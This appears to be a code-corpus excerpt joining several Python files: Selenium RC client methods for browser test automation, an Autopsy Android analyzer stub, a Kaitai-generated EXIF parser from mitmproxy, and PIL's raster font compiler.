which the element should be moved, e.g., "+70,-300" """ self.do_command("dragdrop", [locator,movementsString,]) def set_mouse_speed(self,pixels): """ Configure the number of pixels between "mousemove" events during dragAndDrop commands (default=10). Setting this value to 0 means that we'll send a "mousemove" event to every single pixel in between the start location and the end location; that can be very slow, and may cause some browsers to force the JavaScript to timeout. 
If the mouse speed is greater than the distance between the two dragged objects, we'll just send one "mousemove" at the start location and then one final one at the end location. 'pixels' is the number of pixels between "mousemove" events """ self.do_command("setMouseSpeed", [pixels,]) def get_mouse_speed(self): """ Returns the number of pixels between "mousemove" events during dragAndDrop commands (default=10). """ return self.get_number("getMouseSpeed", []) def drag_and_drop(self,locator,movementsString): """ Drags an element a certain distance and then drops it 'locator' is an element locator 'movementsString' is offset in pixels from the current location to which the element should be moved, e.g., "+70,-300" """ self.do_command("dragAndDrop", [locator,movementsString,]) def drag_and_drop_to_object(self,locatorOfObjectToBeDragged,locatorOfDragDestinationObject): """ Drags an element and drops it on another element 'locatorOfObjectToBeDragged' is an element to be dragged 'locatorOfDragDestinationObject' is an element whose location (i.e., whose center-most pixel) will be the point where locatorOfObjectToBeDragged is dropped """ self.do_command("dragAndDropToObject", [locatorOfObjectToBeDragged,locatorOfDragDestinationObject,]) def window_focus(self): """ Gives focus to the currently selected window """ self.do_command("windowFocus", []) def window_maximize(self): """ Resize currently selected window to take up the entire screen """ self.do_command("windowMaximize", []) def get_all_window_ids(self): """ Returns the IDs of all windows that the browser knows about. """ return self.get_string_array("getAllWindowIds", []) def get_all_window_names(self): """ Returns the names of all windows that the browser knows about. """ return self.get_string_array("getAllWindowNames", []) def get_all_window_titles(self): """ Returns the titles of all windows that the browser knows about. 
""" return self.get_string_array("getAllWindowTitles", []) def get_html_source(self): """ Returns the entire HTML source between the opening and closing "html" tags. """ return self.get_string("getHtmlSource", []) def set_cursor_position(self,locator,position): """ Moves the text cursor to the specified position in the given input element or textarea. This method will fail if the specified element isn't an input element or textarea. 'locator' is an element locator pointing to an input element or textarea 'position' is the numerical position of the cursor in the field; position should be 0 to move the position to the beginning of the field. You can also set the cursor to -1 to move it to the end of the field. """ self.do_command("setCursorPosition", [locator,position,]) def get_element_index(self,locator): """ Get the relative index of an element to its parent (starting from 0). The comment node and empty text node will be ignored. 'locator' is an element locator pointing to an element """ return self.get_number("getElementIndex", [locator,]) def is_ordered(self,locator1,locator2): """ Check if these two elements have same parent and are ordered siblings in the DOM. Two same elements will not be considered ordered. 
'locator1' is an element locator pointing to the first element 'locator2' is an element locator pointing to the second element """ return self.get_boolean("isOrdered", [locator1,locator2,]) def get_element_position_left(self,locator): """ Retrieves the horizontal position of an element 'locator' is an element locator pointing to an element OR an element itself """ return self.get_number("getElementPositionLeft", [locator,]) def get_element_position_top(self,locator): """ Retrieves the vertical position of an element 'locator' is an element locator pointing to an element OR an element itself """ return self.get_number("getElementPositionTop", [locator,]) def get_element_width(self,locator): """ Retrieves the width of an element 'locator' is an element locator pointing to an element """ return self.get_number("getElementWidth", [locator,]) def get_element_height(self,locator): """ Retrieves the height of an element 'locator' is an element locator pointing to an element """ return self.get_number("getElementHeight", [locator,]) def get_cursor_position(self,locator): """ Retrieves the text cursor position in the given input element or textarea; beware, this may not work perfectly on all browsers. Specifically, if the cursor/selection has been cleared by JavaScript, this command will tend to return the position of the last location of the cursor, even though the cursor is now gone from the page. This is filed as SEL-243. This method will fail if the specified element isn't an input element or textarea, or there is no cursor in the element. 'locator' is an element locator pointing to an input element or textarea """ return self.get_number("getCursorPosition", [locator,]) def get_expression(self,expression): """ Returns the specified expression. This is useful because of JavaScript preprocessing. It is used to generate commands like assertExpression and waitForExpression. 
'expression' is the value to return """ return self.get_string("getExpression", [expression,]) def get_xpath_count(self,xpath): """ Returns the number of nodes that match the specified xpath, eg. "//table" would give the number of tables. 'xpath' is the xpath expression to evaluate. do NOT wrap this expression in a 'count()' function; we will do that for you. """ return self.get_number("getXpathCount", [xpath,]) def assign_id(self,locator,identifier): """ Temporarily sets the "id" attribute of the specified element, so you can locate it in the future using its ID rather than a slow/complicated XPath. This ID will disappear once the page is reloaded. 'locator' is an element locator pointing to an element 'identifier' is a string to be used as the ID of the specified element """ self.do_command("assignId", [locator,identifier,]) def allow_native_xpath(self,allow): """ Specifies whether Selenium should use the native in-browser implementation of XPath (if any native version is available); if you pass "false" to this function, we will always use our pure-JavaScript xpath library. Using the pure-JS xpath library can improve the consistency of xpath element locators between different browser vendors, but the pure-JS version is much slower than the native implementations. 'allow' is boolean, true means we'll prefer to use native XPath; false means we'll only use JS XPath """ self.do_command("allowNativeXpath", [allow,]) def ignore_attributes_without_value(self,ignore): """ Specifies whether Selenium will ignore xpath attributes that have no value, i.e. are the empty string, when using the non-native xpath evaluation engine. You'd want to do this for performance reasons in IE. However, this could break certain xpaths, for example an xpath that looks for an attribute whose value is NOT the empty string. The hope is that such xpaths are relatively rare, but the user should have the option of using them. 
Note that this only influences xpath evaluation when using the ajaxslt engine (i.e. not "javascript-xpath"). 'ignore' is boolean, true means we'll ignore attributes without value at the expense of xpath "correctness"; false means we'll sacrifice speed for correctness. """ self.do_command("ignoreAttributesWithoutValue", [ignore,]) def wait_for_condition(self,script,timeout): """ Runs the specified JavaScript snippet repeatedly until it evaluates to "true". The snippet may have multiple lines, but only the result of the last line will be considered. Note that, by default, the snippet will be run in the runner's test window, not in the window of your application. To get the window of your application, you can use the JavaScript snippet ``selenium.browserbot.getCurrentWindow()``, and then run your JavaScript in there 'script' is the JavaScript snippet to run 'timeout' is a timeout in milliseconds, after which this command will return with an error """ self.do_command("waitForCondition", [script,timeout,]) def set_timeout(self,timeout): """ Specifies the amount of time that Selenium will wait for actions to complete. Actions that require waiting include "open" and the "waitFor\*" actions. The default timeout is 30 seconds. 'timeout' is a timeout in milliseconds, after which the action will return with an error """ self.do_command("setTimeout", [timeout,]) def wait_for_page_to_load(self,timeout): """ Waits for a new page to load. You can use this command instead of the "AndWait" suffixes, "clickAndWait", "selectAndWait", "typeAndWait" etc. (which are only available in the JS API). Selenium constantly keeps track of new pages loading, and sets a "newPageLoaded" flag when it first notices a page load. Running any other Selenium command after turns the flag to false. Hence, if you want to wait for a page to load, you must wait immediately after a Selenium command that caused a page-load. 
'timeout' is a timeout in milliseconds, after which this command will return with an error """ self.do_command("waitForPageToLoad", [timeout,]) def wait_for_frame_to_load(self,frameAddress,timeout): """ Waits for a new frame to load. Selenium constantly keeps track of new pages and frames loading, and sets a "newPageLoaded" flag when it first notices a page load. See waitForPageToLoad for more information. 'frameAddress' is FrameAddress from the server side 'timeout' is a timeout in milliseconds, after which this command will return with an error """ self.do_command("waitForFrameToLoad", [frameAddress,timeout,]) def get_cookie(self): """ Return all cookies of the current page under test. """ return self.get_string("getCookie", []) def get_cookie_by_name(self,name): """ Returns the value of the cookie with the specified name, or throws an error if the cookie is not present. 'name' is the name of the cookie """ return self.get_string("getCookieByName", [name,]) def is_cookie_present(self,name): """ Returns true if a cookie with the specified name is present, or false otherwise. 'name' is the name of the cookie """ return self.get_boolean("isCookiePresent", [name,]) def create_cookie(self,nameValuePair,optionsString): """ Create a new cookie whose path and domain are same with those of current page under test, unless you specified a path for this cookie explicitly. 'nameValuePair' is name and value of the cookie in a format "name=value" 'optionsString' is options for the cookie. Currently supported options include 'path', 'max_age' and 'domain'. the optionsString's format is "path=/path/, max_age=60, domain=.foo.com". The order of options are irrelevant, the unit of the value of 'max_age' is second. Note that specifying a domain that isn't a subset of the current domain will usually fail. """ self.do_command("createCookie", [nameValuePair,optionsString,]) def delete_cookie(self,name,optionsString): """ Delete a named cookie with specified path and domain. 
Be careful; to delete a cookie, you need to delete it using the exact same path and domain that were used to create the cookie. If the path is wrong, or the domain is wrong, the cookie simply won't be deleted. Also note that specifying a domain that isn't a subset of the current domain will usually fail. Since there's no way to discover at runtime the original path and domain of a given cookie, we've added an option called 'recurse' to try all sub-domains of the current domain with all paths that are a subset of the current path. Beware; this option can be slow. In big-O notation, it operates in O(n\*m) time, where n is the number of dots in the domain name and m is the number of slashes in the path. 'name' is the name of the cookie to be deleted 'optionsString' is options for the cookie. Currently supported options include 'path', 'domain' and 'recurse.' The optionsString's format is "path=/path/, domain=.foo.com, recurse=true". The order of options are irrelevant. Note that specifying a domain that isn't a subset of the current domain will usually fail. """ self.do_command("deleteCookie", [name,optionsString,]) def delete_all_visible_cookies(self): """ Calls deleteCookie with recurse=true on all cookies visible to the current page. As noted on the documentation for deleteCookie, recurse=true can be much slower than simply deleting the cookies using a known domain/path. """ self.do_command("deleteAllVisibleCookies", []) def set_browser_log_level(self,logLevel): """ Sets the threshold for browser-side logging messages; log messages beneath this threshold will be discarded. Valid logLevel strings are: "debug", "info", "warn", "error" or "off". To see the browser logs, you need to either show the log window in GUI mode, or enable browser-side logging in Selenium RC. 
'logLevel' is one of the following: "debug", "info", "warn", "error" or "off" """ self.do_command("setBrowserLogLevel", [logLevel,]) def run_script(self,script): """ Creates a new "script" tag in the body of the current test window, and adds the specified text into the body of the command. Scripts run in this way can often be debugged more easily than scripts executed using Selenium's "getEval" command. Beware that JS exceptions thrown in these script tags aren't managed by Selenium, so you should probably wrap your script in try/catch blocks if there is any chance that the script will throw an exception. 'script' is the JavaScript snippet to run """ self.do_command("runScript", [script,]) def add_location_strategy(self,strategyName,functionDefinition): """ Defines a new function for Selenium to locate elements on the page. For example, if you define the strategy "foo", and someone runs click("foo=blah"), we'll run your function, passing you the string "blah", and click on the element that your function returns, or throw an "Element not found" error if your function returns null. We'll pass three arguments to your function: * locator: the string the user passed in * inWindow: the currently selected window * inDocument: the currently selected document The function must return null if the element can't be found. 'strategyName' is the name of the strategy to define; this should use only letters [a-zA-Z] with no spaces or other punctuation. 'functionDefinition' is a string defining the body of a function in JavaScript. For example: ``return inDocument.getElementById(locator);`` """ self.do_command("addLocationStrategy", [strategyName,functionDefinition,]) def capture_entire_page_screenshot(self,filename): """ Saves the entire contents of the current window canvas to a PNG file. Currently this only works in Mozilla and when running in chrome mode. Contrast this with the captureScreenshot command, which captures the contents of the OS viewport (i.e. 
whatever is currently being displayed on the monitor), and is implemented in the RC only. Implementation mostly borrowed from the Screengrab! Firefox extension. Please see http://www.screengrab.org for details. 'filename' is the path to the file to persist the screenshot as. No filename extension will be appended by default. Directories will not be created if they do not exist, and an exception will be thrown, possibly by native code. """ self.do_command("captureEntirePageScreenshot", [filename,]) def set_context(self,context): """ Writes a message to the status bar and adds a note to the browser-side log. 'context' is the message to be sent to the browser """ self.do_command("setContext", [context,]) def attach_file(self,fieldLocator,fileLocator): """ Sets a file input (upload) field to the file listed in fileLocator 'fieldLocator' is an element locator 'fileLocator' is a URL pointing to the specified file. Before the file can be set in the input field (fieldLocator), Selenium RC may need to transfer the file to the local machine before attaching the file in a web page form. This is common in selenium grid configurations where the RC server driving the browser is not the same machine that started the test. Supported Browsers: Firefox ("\*chrome") only. """ self.do_command("attachFile", [fieldLocator,fileLocator,]) def capture_screenshot(self,filename): """ Captures a PNG screenshot to the specified file. 'filename' is the absolute path to the file to be written, e.g. "c:\blah\screenshot.png" """ self.do_command("captureScreenshot", [filename,]) def shut_down_selenium_server(self): """ Kills the running Selenium Server and all browser sessions. After you run this command, you will no longer be able to send commands to the server; you can't remotely start the server once it has been stopped. Normally you should prefer to run the "stop" command, which terminates the current browser session, rather than shutting down the entire server. 
""" self.do_command("shutDownSeleniumServer", []) def key_down_native(self,keycode): """ Simulates a user pressing a key (without releasing it yet) by sending a native operating system keystroke. This function uses the java.awt.Robot class to send a keystroke; this more accurately simulates typing a key on the keyboard. It does not honor settings from the shiftKeyDown, controlKeyDown, altKeyDown and metaKeyDown commands, and does not target any particular HTML element. To send a keystroke to a particular element, focus on the element first before running this command. 'keycode' is an integer keycode number corresponding to a java.awt.event.KeyEvent; note that Java keycodes are NOT the same thing as JavaScript keycodes! """ self.do_command("keyDownNative", [keycode,]) def key_up_native(self,keycode): """ Simulates a user releasing a key by sending a native operating system keystroke. This function uses the java.awt.Robot class to send a keystroke; this more accurately simulates typing a key on the keyboard. It does not honor settings from the shiftKeyDown, controlKeyDown, altKeyDown and metaKeyDown commands, and does not target any particular HTML element. To send a keystroke to a particular element, focus on the element first before running this command. 'keycode' is an integer keycode number corresponding to a java.awt.event.KeyEvent; note that Java keycodes are NOT the same thing as JavaScript keycodes! """ self.do_command("keyUpNative", [keycode,]) def key_press_native(self,keycode): """ Simulates a user pressing and releasing a key by sending a native operating system keystroke. This function uses the java.awt.Robot class to send a keystroke; this more accurately simulates typing a key on the keyboard. It does not honor settings from the shiftKeyDown, controlKeyDown, altKeyDown and metaKeyDown commands, and does not target any particular HTML element. To send a keystroke to a particular element, focus on the element first before running this command. 
'keycode' is an integer keycode number corresponding to a java.awt.event.KeyEvent; note that Java keycodes are NOT the same thing as JavaScript keycodes! """ self.do_command("keyPressNative", [keycode,])
narfindustries/autopsy
refs/heads/develop
InternalPythonModules/android/general.py
4
""" Autopsy Forensic Browser Copyright 2016 Basis Technology Corp. Contact: carrier <at> sleuthkit <dot> org Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ MODULE_NAME = "Android Analyzer" """ A parent class of the analyzers """ class AndroidComponentAnalyzer: # The Analyzer should implement this method def analyze(self, dataSource, fileManager, context): raise NotImplementedError
Kriechi/mitmproxy
refs/heads/main
mitmproxy/contrib/kaitaistruct/exif_be.py
4
# This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild from pkg_resources import parse_version from kaitaistruct import __version__ as ks_version, KaitaiStruct, KaitaiStream, BytesIO from enum import Enum if parse_version(ks_version) < parse_version('0.7'): raise Exception("Incompatible Kaitai Struct Python API: 0.7 or later is required, but you have %s" % (ks_version)) class ExifBe(KaitaiStruct): def __init__(self, _io, _parent=None, _root=None): self._io = _io self._parent = _parent self._root = _root if _root else self self._read() def _read(self): self.version = self._io.read_u2be() self.ifd0_ofs = self._io.read_u4be() class Ifd(KaitaiStruct): def __init__(self, _io, _parent=None, _root=None): self._io = _io self._parent = _parent self._root = _root if _root else self self._read() def _read(self): self.num_fields = self._io.read_u2be() self.fields = [None] * (self.num_fields) for i in range(self.num_fields): self.fields[i] = self._root.IfdField(self._io, self, self._root) self.next_ifd_ofs = self._io.read_u4be() @property def next_ifd(self): if hasattr(self, '_m_next_ifd'): return self._m_next_ifd if hasattr(self, '_m_next_ifd') else None if self.next_ifd_ofs != 0: _pos = self._io.pos() self._io.seek(self.next_ifd_ofs) self._m_next_ifd = self._root.Ifd(self._io, self, self._root) self._io.seek(_pos) return self._m_next_ifd if hasattr(self, '_m_next_ifd') else None class IfdField(KaitaiStruct): class FieldTypeEnum(Enum): byte = 1 ascii_string = 2 word = 3 dword = 4 rational = 5 undefined = 7 slong = 9 srational = 10 class TagEnum(Enum): image_width = 256 image_height = 257 bits_per_sample = 258 compression = 259 photometric_interpretation = 262 thresholding = 263 cell_width = 264 cell_length = 265 fill_order = 266 document_name = 269 image_description = 270 make = 271 model = 272 strip_offsets = 273 orientation = 274 samples_per_pixel = 277 rows_per_strip = 278 strip_byte_counts = 279 min_sample_value = 280 
max_sample_value = 281 x_resolution = 282 y_resolution = 283 planar_configuration = 284 page_name = 285 x_position = 286 y_position = 287 free_offsets = 288 free_byte_counts = 289 gray_response_unit = 290 gray_response_curve = 291 t4_options = 292 t6_options = 293 resolution_unit = 296 page_number = 297 color_response_unit = 300 transfer_function = 301 software = 305 modify_date = 306 artist = 315 host_computer = 316 predictor = 317 white_point = 318 primary_chromaticities = 319 color_map = 320 halftone_hints = 321 tile_width = 322 tile_length = 323 tile_offsets = 324 tile_byte_counts = 325 bad_fax_lines = 326 clean_fax_data = 327 consecutive_bad_fax_lines = 328 sub_ifd = 330 ink_set = 332 ink_names = 333 numberof_inks = 334 dot_range = 336 target_printer = 337 extra_samples = 338 sample_format = 339 s_min_sample_value = 340 s_max_sample_value = 341 transfer_range = 342 clip_path = 343 x_clip_path_units = 344 y_clip_path_units = 345 indexed = 346 jpeg_tables = 347 opi_proxy = 351 global_parameters_ifd = 400 profile_type = 401 fax_profile = 402 coding_methods = 403 version_year = 404 mode_number = 405 decode = 433 default_image_color = 434 t82_options = 435 jpeg_tables2 = 437 jpeg_proc = 512 thumbnail_offset = 513 thumbnail_length = 514 jpeg_restart_interval = 515 jpeg_lossless_predictors = 517 jpeg_point_transforms = 518 jpegq_tables = 519 jpegdc_tables = 520 jpegac_tables = 521 y_cb_cr_coefficients = 529 y_cb_cr_sub_sampling = 530 y_cb_cr_positioning = 531 reference_black_white = 532 strip_row_counts = 559 application_notes = 700 uspto_miscellaneous = 999 related_image_file_format = 4096 related_image_width = 4097 related_image_height = 4098 rating = 18246 xp_dip_xml = 18247 stitch_info = 18248 rating_percent = 18249 sony_raw_file_type = 28672 light_falloff_params = 28722 chromatic_aberration_corr_params = 28725 distortion_corr_params = 28727 image_id = 32781 wang_tag1 = 32931 wang_annotation = 32932 wang_tag3 = 32933 wang_tag4 = 32934 image_reference_points = 
32953 region_xform_tack_point = 32954 warp_quadrilateral = 32955 affine_transform_mat = 32956 matteing = 32995 data_type = 32996 image_depth = 32997 tile_depth = 32998 image_full_width = 33300 image_full_height = 33301 texture_format = 33302 wrap_modes = 33303 fov_cot = 33304 matrix_world_to_screen = 33305 matrix_world_to_camera = 33306 model2 = 33405 cfa_repeat_pattern_dim = 33421 cfa_pattern2 = 33422 battery_level = 33423 kodak_ifd = 33424 copyright = 33432 exposure_time = 33434 f_number = 33437 md_file_tag = 33445 md_scale_pixel = 33446 md_color_table = 33447 md_lab_name = 33448 md_sample_info = 33449 md_prep_date = 33450 md_prep_time = 33451 md_file_units = 33452 pixel_scale = 33550 advent_scale = 33589 advent_revision = 33590 uic1_tag = 33628 uic2_tag = 33629 uic3_tag = 33630 uic4_tag = 33631 iptc_naa = 33723 intergraph_packet_data = 33918 intergraph_flag_registers = 33919 intergraph_matrix = 33920 ingr_reserved = 33921 model_tie_point = 33922 site = 34016 color_sequence = 34017 it8_header = 34018 raster_padding = 34019 bits_per_run_length = 34020 bits_per_extended_run_length = 34021 color_table = 34022 image_color_indicator = 34023 background_color_indicator = 34024 image_color_value = 34025 background_color_value = 34026 pixel_intensity_range = 34027 transparency_indicator = 34028 color_characterization = 34029 hc_usage = 34030 trap_indicator = 34031 cmyk_equivalent = 34032 sem_info = 34118 afcp_iptc = 34152 pixel_magic_jbig_options = 34232 jpl_carto_ifd = 34263 model_transform = 34264 wb_grgb_levels = 34306 leaf_data = 34310 photoshop_settings = 34377 exif_offset = 34665 icc_profile = 34675 tiff_fx_extensions = 34687 multi_profiles = 34688 shared_data = 34689 t88_options = 34690 image_layer = 34732 geo_tiff_directory = 34735 geo_tiff_double_params = 34736 geo_tiff_ascii_params = 34737 jbig_options = 34750 exposure_program = 34850 spectral_sensitivity = 34852 gps_info = 34853 iso = 34855 opto_electric_conv_factor = 34856 interlace = 34857 time_zone_offset = 
34858 self_timer_mode = 34859 sensitivity_type = 34864 standard_output_sensitivity = 34865 recommended_exposure_index = 34866 iso_speed = 34867 iso_speed_latitudeyyy = 34868 iso_speed_latitudezzz = 34869 fax_recv_params = 34908 fax_sub_address = 34909 fax_recv_time = 34910 fedex_edr = 34929 leaf_sub_ifd = 34954 exif_version = 36864 date_time_original = 36867 create_date = 36868 google_plus_upload_code = 36873 offset_time = 36880 offset_time_original = 36881 offset_time_digitized = 36882 components_configuration = 37121 compressed_bits_per_pixel = 37122 shutter_speed_value = 37377 aperture_value = 37378 brightness_value = 37379 exposure_compensation = 37380 max_aperture_value = 37381 subject_distance = 37382 metering_mode = 37383 light_source = 37384 flash = 37385 focal_length = 37386 flash_energy = 37387 spatial_frequency_response = 37388 noise = 37389 focal_plane_x_resolution = 37390 focal_plane_y_resolution = 37391 focal_plane_resolution_unit = 37392 image_number = 37393 security_classification = 37394 image_history = 37395 subject_area = 37396 exposure_index = 37397 tiff_ep_standard_id = 37398 sensing_method = 37399 cip3_data_file = 37434 cip3_sheet = 37435 cip3_side = 37436 sto_nits = 37439 maker_note = 37500 user_comment = 37510 sub_sec_time = 37520 sub_sec_time_original = 37521 sub_sec_time_digitized = 37522 ms_document_text = 37679 ms_property_set_storage = 37680 ms_document_text_position = 37681 image_source_data = 37724 ambient_temperature = 37888 humidity = 37889 pressure = 37890 water_depth = 37891 acceleration = 37892 camera_elevation_angle = 37893 xp_title = 40091 xp_comment = 40092 xp_author = 40093 xp_keywords = 40094 xp_subject = 40095 flashpix_version = 40960 color_space = 40961 exif_image_width = 40962 exif_image_height = 40963 related_sound_file = 40964 interop_offset = 40965 samsung_raw_pointers_offset = 40976 samsung_raw_pointers_length = 40977 samsung_raw_byte_order = 41217 samsung_raw_unknown = 41218 flash_energy2 = 41483 
spatial_frequency_response2 = 41484 noise2 = 41485 focal_plane_x_resolution2 = 41486 focal_plane_y_resolution2 = 41487 focal_plane_resolution_unit2 = 41488 image_number2 = 41489 security_classification2 = 41490 image_history2 = 41491 subject_location = 41492 exposure_index2 = 41493 tiff_ep_standard_id2 = 41494 sensing_method2 = 41495 file_source = 41728 scene_type = 41729 cfa_pattern = 41730 custom_rendered = 41985 exposure_mode = 41986 white_balance = 41987 digital_zoom_ratio = 41988 focal_length_in35mm_format = 41989 scene_capture_type = 41990 gain_control = 41991 contrast = 41992 saturation = 41993 sharpness = 41994 device_setting_description = 41995 subject_distance_range = 41996 image_unique_id = 42016 owner_name = 42032 serial_number = 42033 lens_info = 42034 lens_make = 42035 lens_model = 42036 lens_serial_number = 42037 gdal_metadata = 42112 gdal_no_data = 42113 gamma = 42240 expand_software = 44992 expand_lens = 44993 expand_film = 44994 expand_filter_lens = 44995 expand_scanner = 44996 expand_flash_lamp = 44997 pixel_format = 48129 transformation = 48130 uncompressed = 48131 image_type = 48132 image_width2 = 48256 image_height2 = 48257 width_resolution = 48258 height_resolution = 48259 image_offset = 48320 image_byte_count = 48321 alpha_offset = 48322 alpha_byte_count = 48323 image_data_discard = 48324 alpha_data_discard = 48325 oce_scanjob_desc = 50215 oce_application_selector = 50216 oce_id_number = 50217 oce_image_logic = 50218 annotations = 50255 print_im = 50341 original_file_name = 50547 uspto_original_content_type = 50560 dng_version = 50706 dng_backward_version = 50707 unique_camera_model = 50708 localized_camera_model = 50709 cfa_plane_color = 50710 cfa_layout = 50711 linearization_table = 50712 black_level_repeat_dim = 50713 black_level = 50714 black_level_delta_h = 50715 black_level_delta_v = 50716 white_level = 50717 default_scale = 50718 default_crop_origin = 50719 default_crop_size = 50720 color_matrix1 = 50721 color_matrix2 = 50722 
camera_calibration1 = 50723 camera_calibration2 = 50724 reduction_matrix1 = 50725 reduction_matrix2 = 50726 analog_balance = 50727 as_shot_neutral = 50728 as_shot_white_xy = 50729 baseline_exposure = 50730 baseline_noise = 50731 baseline_sharpness = 50732 bayer_green_split = 50733 linear_response_limit = 50734 camera_serial_number = 50735 dng_lens_info = 50736 chroma_blur_radius = 50737 anti_alias_strength = 50738 shadow_scale = 50739 sr2_private = 50740 maker_note_safety = 50741 raw_image_segmentation = 50752 calibration_illuminant1 = 50778 calibration_illuminant2 = 50779 best_quality_scale = 50780 raw_data_unique_id = 50781 alias_layer_metadata = 50784 original_raw_file_name = 50827 original_raw_file_data = 50828 active_area = 50829 masked_areas = 50830 as_shot_icc_profile = 50831 as_shot_pre_profile_matrix = 50832 current_icc_profile = 50833 current_pre_profile_matrix = 50834 colorimetric_reference = 50879 s_raw_type = 50885 panasonic_title = 50898 panasonic_title2 = 50899 camera_calibration_sig = 50931 profile_calibration_sig = 50932 profile_ifd = 50933 as_shot_profile_name = 50934 noise_reduction_applied = 50935 profile_name = 50936 profile_hue_sat_map_dims = 50937 profile_hue_sat_map_data1 = 50938 profile_hue_sat_map_data2 = 50939 profile_tone_curve = 50940 profile_embed_policy = 50941 profile_copyright = 50942 forward_matrix1 = 50964 forward_matrix2 = 50965 preview_application_name = 50966 preview_application_version = 50967 preview_settings_name = 50968 preview_settings_digest = 50969 preview_color_space = 50970 preview_date_time = 50971 raw_image_digest = 50972 original_raw_file_digest = 50973 sub_tile_block_size = 50974 row_interleave_factor = 50975 profile_look_table_dims = 50981 profile_look_table_data = 50982 opcode_list1 = 51008 opcode_list2 = 51009 opcode_list3 = 51022 noise_profile = 51041 time_codes = 51043 frame_rate = 51044 t_stop = 51058 reel_name = 51081 original_default_final_size = 51089 original_best_quality_size = 51090 
original_default_crop_size = 51091 camera_label = 51105 profile_hue_sat_map_encoding = 51107 profile_look_table_encoding = 51108 baseline_exposure_offset = 51109 default_black_render = 51110 new_raw_image_digest = 51111 raw_to_preview_gain = 51112 default_user_crop = 51125 padding = 59932 offset_schema = 59933 owner_name2 = 65000 serial_number2 = 65001 lens = 65002 kdc_ifd = 65024 raw_file = 65100 converter = 65101 white_balance2 = 65102 exposure = 65105 shadows = 65106 brightness = 65107 contrast2 = 65108 saturation2 = 65109 sharpness2 = 65110 smoothness = 65111 moire_filter = 65112 def __init__(self, _io, _parent=None, _root=None): self._io = _io self._parent = _parent self._root = _root if _root else self self._read() def _read(self): self.tag = self._root.IfdField.TagEnum(self._io.read_u2be()) self.field_type = self._root.IfdField.FieldTypeEnum(self._io.read_u2be()) self.length = self._io.read_u4be() self.ofs_or_data = self._io.read_u4be() @property def type_byte_length(self): if hasattr(self, '_m_type_byte_length'): return self._m_type_byte_length if hasattr(self, '_m_type_byte_length') else None self._m_type_byte_length = (2 if self.field_type == self._root.IfdField.FieldTypeEnum.word else (4 if self.field_type == self._root.IfdField.FieldTypeEnum.dword else 1)) return self._m_type_byte_length if hasattr(self, '_m_type_byte_length') else None @property def byte_length(self): if hasattr(self, '_m_byte_length'): return self._m_byte_length if hasattr(self, '_m_byte_length') else None self._m_byte_length = (self.length * self.type_byte_length) return self._m_byte_length if hasattr(self, '_m_byte_length') else None @property def is_immediate_data(self): if hasattr(self, '_m_is_immediate_data'): return self._m_is_immediate_data if hasattr(self, '_m_is_immediate_data') else None self._m_is_immediate_data = self.byte_length <= 4 return self._m_is_immediate_data if hasattr(self, '_m_is_immediate_data') else None @property def data(self): if hasattr(self, '_m_data'): 
return self._m_data if hasattr(self, '_m_data') else None if not (self.is_immediate_data): io = self._root._io _pos = io.pos() io.seek(self.ofs_or_data) self._m_data = io.read_bytes(self.byte_length) io.seek(_pos) return self._m_data if hasattr(self, '_m_data') else None @property def ifd0(self): if hasattr(self, '_m_ifd0'): return self._m_ifd0 if hasattr(self, '_m_ifd0') else None _pos = self._io.pos() self._io.seek(self.ifd0_ofs) self._m_ifd0 = self._root.Ifd(self._io, self, self._root) self._io.seek(_pos) return self._m_ifd0 if hasattr(self, '_m_ifd0') else None
boretom/pyload-apkg
refs/heads/master
source/py-mods-prebuilt-x86-64/site-packages/PIL/FontFile.py
40
#
# The Python Imaging Library
# $Id$
#
# base class for raster font file parsers
#
# history:
# 1997-06-05 fl created
# 1997-08-19 fl restrict image width
#
# Copyright (c) 1997-1998 by Secret Labs AB
# Copyright (c) 1997-1998 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#

# NOTE(review): Python 2-era PIL code (top-level "import Image", str objects
# written to files opened in "wb" mode); keep on Python 2 unless ported
# deliberately. The original source had its newlines stripped; formatting has
# been restored here without changing any code token.

import os
import Image
import marshal

try:
    import zlib
except ImportError:
    # zlib is optional; save2() falls back to an uncompressed payload.
    zlib = None

# Maximum pixel width of the packed glyph bitmap; glyph placement wraps to a
# new row once a row would exceed this.
WIDTH = 800

def puti16(fp, values):
    # write network order (big-endian) 16-bit sequence
    # Negative values are stored in two's-complement 16-bit form.
    for v in values:
        if v < 0:
            v = v + 65536
        fp.write(chr(v>>8&255) + chr(v&255))

##
# Base class for raster font file handlers.

class FontFile:

    # Packed glyph bitmap; created lazily by compile().
    bitmap = None

    def __init__(self):
        # info: font metadata; glyph: one slot per 8-bit code point, each
        # either None or a (delta, dst, src, image) tuple filled by a parser.
        self.info = {}
        self.glyph = [None] * 256

    def __getitem__(self, ix):
        # Return the glyph record for code point ix (None if absent).
        return self.glyph[ix]

    def compile(self):
        "Create metrics and bitmap"

        if self.bitmap:
            return

        # create bitmap large enough to hold all data
        h = w = maxwidth = 0
        lines = 1
        for glyph in self:
            if glyph:
                d, dst, src, im = glyph
                h = max(h, src[3] - src[1])
                w = w + (src[2] - src[0])
                if w > WIDTH:
                    lines = lines + 1
                    w = (src[2] - src[0])
                maxwidth = max(maxwidth, w)

        xsize = maxwidth
        ysize = lines * h

        if xsize == 0 and ysize == 0:
            return ""

        self.ysize = h

        # paste glyphs into bitmap
        self.bitmap = Image.new("1", (xsize, ysize))
        self.metrics = [None] * 256
        x = y = 0
        for i in range(256):
            glyph = self[i]
            if glyph:
                d, dst, src, im = glyph
                xx, yy = src[2] - src[0], src[3] - src[1]
                x0, y0 = x, y
                x = x + xx
                if x > WIDTH:
                    # wrap to the start of the next row of glyphs
                    x, y = 0, y + h
                    x0, y0 = x, y
                    x = xx
                # s: where this glyph landed in the packed bitmap
                s = src[0] + x0, src[1] + y0, src[2] + x0, src[3] + y0
                self.bitmap.paste(im.crop(src), s)
                # print chr(i), dst, s
                self.metrics[i] = d, dst, s

    def save1(self, filename):
        "Save font in version 1 format"

        self.compile()

        # font data
        self.bitmap.save(os.path.splitext(filename)[0] + ".pbm", "PNG")

        # font metrics
        fp = open(os.path.splitext(filename)[0] + ".pil", "wb")
        fp.write("PILfont\n")
        fp.write(";;;;;;%d;\n" % self.ysize) # HACK!!!
